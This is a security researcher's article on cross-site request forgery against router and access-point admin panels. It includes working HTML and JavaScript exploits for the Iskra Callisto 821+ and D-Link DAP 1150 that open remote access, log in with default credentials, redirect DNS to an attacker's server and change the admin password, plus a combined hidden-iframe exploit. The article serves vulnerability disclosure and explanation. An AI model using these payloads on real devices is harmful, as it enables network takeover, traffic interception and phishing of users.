CSRF attacks on network devices

English Ukrainian

Eugene Dokukin aka MustLive

Similar to vulnerabilities in web applications on web sites, there are also vulnerabilities in the admin panels of different network devices, including Cross-Site Request Forgery (CSRF) vulnerabilities. Which can be attack similarly to web sites - by attacking users who have access to these network devices.

Almost all network devices are vulnerable to CSRF [1] due to misunderstanding of this threat by developers of such devices. So attackers can conduct remote CSRF attacks on network devices, such as routers, Wi-Fi Access Points and others, to do many different nasty things. Attackers can DoS them, disable different functionalities and change different settings, which allows them to take devices under full control (and take control on the users’ traffic through these devices).

Such vulnerabilities exist in different network devices, such as Iskra Callisto 821+, D-Link DSL-500T ADSL Router and D-Link DAP 1150, vulnerabilities in which I’ve found and disclosed at my site. And by using CSRF attacks on these vulnerabilities the attacker can receive full control of these devices.

Possibilities of CSRF attacks on network devices.

Developers of network devices don’t attend enough to security (vulnerabilities in such devices are found all the time), especially CSRF, because they think that devices will reside in a LAN and will not accessible from Internet. But it’s not true, when such devices resides in a LAN, which has computers with access to Internet (CSRF attacks can be conducted via the browsers of the users at these computers). Not mentioning that there is also a threat of local attacks - from malicious local attackers or viruses - so developers should not leave their devices with remote or local vulnerabilities.

For example routers and ADSL modems, which allow users to access the Internet, are typically affected devices. These can be attacked remotely via CSRF from the Internet. For external attackers the most interest represent such network devices as routers and other devices with router-functionality (ADSL modems, Wi-Fi Access Points, etc.). Because it’s possible to setup these devices in such way, that attacker will take control of the traffic - all traffic (such as DNS requests) will be send via his own server, allowing him to sniff confidential data and conduct phishing attacks on all users in a LAN who are using these devices to access the Internet.

Real attacks on network devices.

Let’s see how real attacks can be conducted on example of Iskra Callisto 821+ and D-Link DAP 1150. Callisto 821+ it’s ADSL Router (and similar vulnerabilities can be in all other devices from Iskra). The DAP 1150 is a Wi-Fi Access Point and router (similar vulnerabilities can be in all other devices from D-Link).

There can be different attacks created. Let’s take a look at two attacks, which are very advantageous for the attackers. In the first scenario the attacker will conduct part of the actions remotely and part manually via the admin panel, and in the second scenario the attacker will conduct all the actions remotely. Both Callisto 821+ and DAP 1150 (in Router mode) support remote access to admin panel and support setup of DNS servers, but for different devices I’ll show different attack scenarios.

The first attack it’s to turn on the remote access to the admin panel (it’s off by default), to allow remote attacker to access the admin panel from the Internet and change all required settings (and this attack can be conducted in one request). Network devices which have an option to allow remote access and have CSRF vulnerabilities can be attacked in such way.

The second attack is used to send multiple requests to change DNS settings (and other settings) of the router. Those network devices which don’t allow remote access (due to lack of such option in the admin panel) and have CSRF vulnerabilities need multi-request attacks to change all required settings remotely.

The scenario of the first attack will be the following:

1. Identify local IP address of the device (in most cases default address will work).

2. Send request to open remote access.

The scenario of the second attack will be the following:

1. Identify local IP address of the device (in most cases default address will work).

2. Send request for remote login into admin panel (optional).

3. Send request to change DNS.

4. Send request to save settings.

5. Send request to change default password (optional).

The attack #1.

For the first scenario the attack will be the next:

1. Taking into account Predictable Resource Location vulnerability in Callisto 821+ [2], the admin panel will be by default at http://192.168.1.1.

2. Conduct attack on CSRF vulnerability in Callisto 821+ [3] (on logged in user) to open remote access (e.g. for 30 minutes, as in this example):

<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/system/remote.html" method="post">
<input type="hidden" name="idleTimeout" value="30">
</form>
</body>

After that, the attacker will be able to access the admin panel remotely from the Internet during the time, for which remote access was opened. The attacker will be able to change all required settings, such as DNS settings, to attack all the users, which are going to the Internet via this device. To log into the router’s admin panel it’ll need to use the default username and password. If there is a possibility that device’s owner has changed default password, then it’s needed after opening of remote access also to add new user with access to admin panel via another CSRF vulnerability in Callisto 821+ [4].

The attack #2.

For the second scenario the attack will be the next:

1. Taking into account Predictable Resource Location vulnerability in DAP 1150 [5], the admin panel will be by default at http://192.168.0.50. And default username and password are admin:admin.

2. Use CSRF vulnerability in DAP 1150 [5] to conduct remote login attack (optional).

<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.0.50/index.cgi" method="post">
<input type="hidden" name="v2" value="y">
<input type="hidden" name="rs_type" value="html">
<input type="hidden" name="A1" value="admin">
<input type="hidden" name="A2" value="admin">
<input type="hidden" name="auth" value="auth">
</form>
</body>

Remote login - it is CSRF attack on login forms, which I’ve presented in April 2011 in my article Attacks on unprotected login forms [6]. This is an optional step (without it the attack should be conducted on logged in user). The attackers can use it to make sure, that the victim is logged into admin panel for making further attacks on different functionalities of the admin panel.

Such a straightforward remote login attack will work against every affected network device, but not against DAP 1150. Due to specific implementation of the authentication by D-Link in their device. Besides sending of above-mentioned POST request it’s also needed to set two cookies (with username and password) just before the request, i.e. the browser should send these cookies along with the request. To bypass this pitfall there can be used the method, which I’ve developed last year and described in my article Remote login with using of Clickjacking [7].

3. On this step we can change DNS or change routing table to attack users of this device. Let’s set the attacker’s DNS server (50.50.50.50 in this example):

<img src="http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=7&res_struct_size=0&res_buf={%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">

4. Save settings, so they will work even after restart of the device [8].

<img src="http://192.168.0.50/index.cgi?res_cmd=20&res_buf=null&res_cmd_type=bl&v2=y&rq=y">

5. Change default password to prevent the admin logging into the admin panel [9] (optional).

<img src="http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_config_id=69&res_struct_size=1&res_buf=password|">

As an optional step, the attacker can change the default password to prevent the admin logging into the admin panel. Which will require to send CSRF request to change the password and then repeat second step (with new password) and third step to save it persistently (because after changing of the password the user is logged out from the admin panel).

After these steps, it will be possible to attack all the users, which are going to the Internet via this device. Because all DNS requests will be going through attacker’s DNS server.

These steps of the attack (without the optional steps) can be combined into one exploit:

<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
 for (var i=1;i<=3;i++) {
 var ifr = document.createElement("iframe");
 ifr.setAttribute(’name’, ‘csrf’+i);
 ifr.setAttribute(’width’, ‘0′);
 ifr.setAttribute(’height’, ‘0′);
 document.body.appendChild(ifr);
 }
 CSRF1();
 setTimeout(CSRF2,1000);
 setTimeout(CSRF3,2000);
}
function CSRF1() {
 window.frames["csrf3"].document.body.innerHTML = ‘<form name="hack" action="http://192.168.0.50/index.cgi" method="get">n<input type="hidden" name="v2" value="y">n<input type="hidden" name="rq" value="y">n<input type="hidden" name="res_json" value="y">n<input type="hidden" name="res_data_type" value="json">n<input type="hidden" name="res_config_action" value="3">n<input type="hidden" name="res_config_id" value="7">n<input type="hidden" name="res_struct_size" value="0">n<input type="hidden" name="res_buf" value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">n</form>’;
 window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
 window.frames["csrf4"].document.body.innerHTML = ‘<form name="hack" action="http://192.168.0.50/index.cgi" method="get">n<input type="hidden" name="res_cmd" value="20">n<input type="hidden" name="res_buf" value="null">n<input type="hidden" name="res_cmd_type" value="bl">n<input type="hidden" name="v2" value="y">n<input type="hidden" name="rq" value="y">n</form>’;
 window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
 window.frames["csrf2"].document.body.innerHTML = ‘<form name="hack" action="http://192.168.0.50/index.cgi" method="get">n<input type="hidden" name="v2" value="y">n<input type="hidden" name="rq" value="y">n<input type="hidden" name="res_config_action" value="3">n<input type="hidden" name="res_config_id" value="69">n<input type="hidden" name="res_struct_size" value="1">n<input type="hidden" name="res_buf" value="password|">n</form>’;
 window.frames["csrf2"].document.hack.submit();
}
</script>
</body>

The attack was conducted using standard approaches for CSRF attacks. The exploit needs to be placed at the attacker’s site. Then attacker needs to force a victim to visit the page with an exploit by use of social engineering. After visiting of such page, the victim will not see anything suspicious, only content on the web page for distracting attention, while the attack will be hiddenly conducted.

These examples of CSRF-exploits were created with my CSRF Generator [10]. Which can be used for creating PoCs and exploits during security researches and security audits.

Conclusion.

Because CSRF vulnerabilities are very widespread among network devices, which are used in LAN, and because developers of network devices don’t attend enough to security, especially concerning CSRF, we received such situation. When almost all network devices have CSRF vulnerabilities, which can be attacked remotely via Internet (by attacking users which are going in Internet from computers from those LANs). And it can lead to serious consequences up to the whole network compromise, including sniffing of all Internet traffic, MITMing and forging of connections to web sites.

References:

1. Cross-Site Request Forgery (http://projects.webappsec.org/Cross-Site-Request-Forgery).
2. Vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5161/).
3. CSRF vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5172/).
4. New CSRF and XSS vulnerabilities in ADSL modem Callisto 821+ (http://websecurity.com.ua/5168/).
5. Vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5558/).
6. Attacks on unprotected login forms (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).
7. Remote login with using of Clickjacking (http://websecurity.com.ua/5447/).
8. Multiple CSRF, DoS and XSS vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5567/).
9. AoF and CSRF vulnerabilities in D-Link DAP 1150 (http://websecurity.com.ua/5561/).
10. CSRF Generator (http://websecurity.com.ua/csrf_generator/).